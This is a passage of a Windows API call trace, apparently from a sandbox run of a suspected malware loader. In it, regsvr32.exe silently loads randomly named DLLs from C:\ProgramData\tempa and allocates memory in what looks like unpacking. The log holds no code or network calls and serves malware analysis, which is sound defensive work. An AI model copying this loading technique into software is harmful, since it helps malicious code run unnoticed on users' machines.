[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffee, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffd7, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffd6, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffe7, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffe8, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffe9, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffe6, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffe4, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xffe2, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xffe1, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xffe0, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xffff, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xfffe, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xfffd, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xfffc, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xfff5, lpBuffer=0x12c92c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xffe3, lpBuffer=0x12c92c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0085.561] GetVersionExW (in: lpVersionInformation=0x12e840*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12e840*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.561] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0085.561] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x334b60
[0085.561] GetProcAddress (hModule=0x75370000, lpProcName="GetNativeSystemInfo") returned 0x753abe77
[0085.561] GetNativeSystemInfo (in: lpSystemInfo=0x12e81c | out: lpSystemInfo=0x12e81c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0085.561] LoadStringW (in: hInstance=0x5d0000, uID=0xff5b, lpBuffer=0x12c804, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xff5e, lpBuffer=0x12c804, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xfffb, lpBuffer=0x12c924, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xfffa, lpBuffer=0x12c924, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xfff9, lpBuffer=0x12c924, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xfff8, lpBuffer=0x12c924, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xfff7, lpBuffer=0x12c924, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xff8c, lpBuffer=0x12c924, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16
[0085.562] LoadStringW (in: hInstance=0x5d0000, uID=0xff6c, lpBuffer=0x12c924, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20
[0085.562] GetVersionExW (in: lpVersionInformation=0x12e834*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12e834*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.562] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0085.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x7e80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19
[0085.562] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExW") returned 0x753ade40
[0085.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12e70a, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0085.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e918 | out: phkResult=0x12e918*=0x0) returned 0x2
[0085.562] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e918 | out: phkResult=0x12e918*=0x0) returned 0x2
[0085.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e918 | out: phkResult=0x12e918*=0x0) returned 0x2
[0085.562] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e918 | out: phkResult=0x12e918*=0x0) returned 0x2
[0085.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e918 | out: phkResult=0x12e918*=0x0) returned 0x2
[0085.563] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e918 | out: phkResult=0x12e918*=0x0) returned 0x2
[0085.563] GetThreadLocale () returned 0x409
[0085.563] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12e850 | out: lpCPInfo=0x12e850) returned 1
[0085.563] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0085.563] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.563] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0085.563] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0085.563] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x334b70
[0085.563] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0085.563] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12e7a8 | out: Buffer=0x0, ReturnedLength=0x12e7a8) returned 0
[0085.563] GetLastError () returned 0x7a
[0085.564] GetLogicalProcessorInformation (in: Buffer=0x7d99d0, ReturnedLength=0x12e7a8 | out: Buffer=0x7d99d0, ReturnedLength=0x12e7a8) returned 1
[0085.564] GetCurrentThreadId () returned 0xf1c
[0085.564] GetCurrentThreadId () returned 0xf1c
[0085.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="2") returned 2
[0085.564] GetThreadLocale () returned 0x409
[0085.564] EnumCalendarInfoW (lpCalInfoEnumProc=0x5f5810, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1
[0085.564] GetThreadLocale () returned 0x409
[0085.564] EnumCalendarInfoW (lpCalInfoEnumProc=0x5f58b4, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1
[0085.565] GetCurrentThreadId () returned 0xf1c
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Sun") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Sunday") returned 7
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Mon") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Monday") returned 7
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Tue") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Tuesday") returned 8
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Wed") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Wednesday") returned 10
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Thu") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Thursday") returned 9
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Fri") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Friday") returned 7
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Sat") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12e5b4, cchData=256 | out: lpLCData="Saturday") returned 9
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Jan") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="January") returned 8
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Feb") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="February") returned 9
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Mar") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="March") returned 6
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Apr") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="April") returned 6
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="May") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="May") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Jun") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="June") returned 5
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Jul") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="July") returned 5
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Aug") returned 4
[0085.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="August") returned 7
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Sep") returned 4
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="September") returned 10
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Oct") returned 4
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="October") returned 8
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Nov") returned 4
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="November") returned 9
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="Dec") returned 4
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12e5b8, cchData=256 | out: lpLCData="December") returned 9
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12e608, cchData=256 | out: lpLCData="$") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12e608, cchData=256 | out: lpLCData="0") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12e608, cchData=256 | out: lpLCData="0") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12e800, cchData=2 | out: lpLCData=",") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12e800, cchData=2 | out: lpLCData=".") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12e608, cchData=256 | out: lpLCData="2") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12e800, cchData=2 | out: lpLCData="/") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12e5c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12e5c0, cchData=256 | out: lpLCData="1") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12e5c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12e5c0, cchData=256 | out: lpLCData="1") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12e800, cchData=2 | out: lpLCData=":") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12e608, cchData=256 | out: lpLCData="AM") returned 3
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12e608, cchData=256 | out: lpLCData="PM") returned 3
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12e608, cchData=256 | out: lpLCData="0") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12e608, cchData=256 | out: lpLCData="0") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12e608, cchData=256 | out: lpLCData="0") returned 2
[0085.566] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12e800, cchData=2 | out: lpLCData=",") returned 2
[0085.567] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x758f0000
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0085.567] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0085.568] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0085.569] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xc0
[0085.569] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xc4
[0085.569] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xc8
[0085.569] LoadStringW (in: hInstance=0x5d0000, uID=0xff31, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid time Offset string: %s") returned 0x1e
[0085.569] LoadStringW (in: hInstance=0x5d0000, uID=0xff30, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid time string: %s") returned 0x17
[0085.569] LoadStringW (in: hInstance=0x5d0000, uID=0xff4f, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid date string: %s") returned 0x17
[0085.569] GetDC (hWnd=0x0) returned 0x2b010799
[0085.569] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0085.569] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0085.569] GetDC (hWnd=0x0) returned 0x2b010799
[0085.569] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0085.569] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0085.569] CreatePalette (plpal=0x12e540) returned 0x4408081b
[0085.569] GetStockObject (i=7) returned 0x1b00017
[0085.569] GetStockObject (i=5) returned 0x1900015
[0085.569] GetStockObject (i=13) returned 0x18a002e
[0085.569] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0085.570] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0085.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e820 | out: phkResult=0x12e820*=0xcc) returned 0x0
[0085.570] RegQueryValueExW (in: hKey=0xcc, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x12e7f4, lpData=0x0, lpcbData=0x12e80c*=0x0 | out: lpType=0x12e7f4*=0x1, lpData=0x0, lpcbData=0x12e80c*=0xe) returned 0x0
[0085.570] RegQueryValueExW (in: hKey=0xcc, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x12e808, lpData=0x7d288c, lpcbData=0x12e818*=0xe | out: lpType=0x12e808*=0x1, lpData="Tahoma", lpcbData=0x12e818*=0xe) returned 0x0
[0085.570] RegCloseKey (hKey=0xcc) returned 0x0
[0085.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0x12e84d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahoma", lpUsedDefaultChar=0x0) returned 6
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] GetCurrentThreadId () returned 0xf1c
[0085.570] LoadLibraryW (lpLibFileName="c:\\programdata\\tempa\\marxvxinhhm98.dll") returned 0x830000
[0085.669] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0085.669] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0085.669] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0085.669] GetProcAddress (hModule=0x75370000, lpProcName="VirtualProtect") returned 0x753b2341
[0085.669] VirtualAlloc (lpAddress=0x0, dwSize=0x1800, flAllocationType=0x1000, flProtect=0x4) returned 0x430000
[0085.669] VirtualAlloc (lpAddress=0x0, dwSize=0xea10e, flAllocationType=0x1000, flProtect=0x4) returned 0x950000
[0085.792] VirtualFree (lpAddress=0x950000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.894] VirtualAlloc (lpAddress=0x0, dwSize=0xb0e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.895] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.895] VirtualAlloc (lpAddress=0x0, dwSize=0x450e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.897] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.897] VirtualAlloc (lpAddress=0x0, dwSize=0x1b0e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.898] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.898] VirtualAlloc (lpAddress=0x0, dwSize=0x50e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.899] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.899] VirtualAlloc (lpAddress=0x0, dwSize=0x1630e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.916] SetThreadLocale (Locale=0x400) returned 1
[0085.916] GetVersion () returned 0x1db10106
[0085.916] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.916] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadPreferredUILanguages") returned 0x753b22d7
[0085.917] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.917] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadPreferredUILanguages") returned 0x753ae627
[0085.917] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.917] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadUILanguage") returned 0x753aae42
[0085.917] GetSystemInfo (in: lpSystemInfo=0x12e58c | out: lpSystemInfo=0x12e58c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0085.917] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\tempa\\marxvxinhhm64.dll\""
[0085.917] GetStartupInfoW (in: lpStartupInfo=0x12e568 | out: lpStartupInfo=0x12e568*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x24a, hStdError=0x1f80))
[0085.917] GetACP () returned 0x4e4
[0085.917] GetCurrentThreadId () returned 0xf1c
[0085.917] GetVersion () returned 0x1db10106
[0085.917] GetVersionExW (in: lpVersionInformation=0x12e4ac*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x12e4f8, dwMinorVersion=0x12e4f8, dwBuildNumber=0x332ea0, dwPlatformId=0x12e55c, szCSDVersion="\xfa22\x76f7\x70f2\x76f7\x6054\x76f6\x9582\x7532\xffff\xffff\x25") | out: lpVersionInformation=0x12e4ac*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.917] GetModuleFileNameW (in: hModule=0x830000, lpFilename=0x12c36c, nSize=0x20a | out: lpFilename="c:\\programdata\\tempa\\marxvxinhhm98.dll" (normalized: "c:\\programdata\\tempa\\marxvxinhhm98.dll")) returned 0x26
[0085.917] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12c156, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0085.917] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1650000
[0085.918] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c0d0 | out: phkResult=0x12c0d0*=0x0) returned 0x2
[0085.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c0d0 | out: phkResult=0x12c0d0*=0x0) returned 0x2
[0085.918] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c0d0 | out: phkResult=0x12c0d0*=0x0) returned 0x2
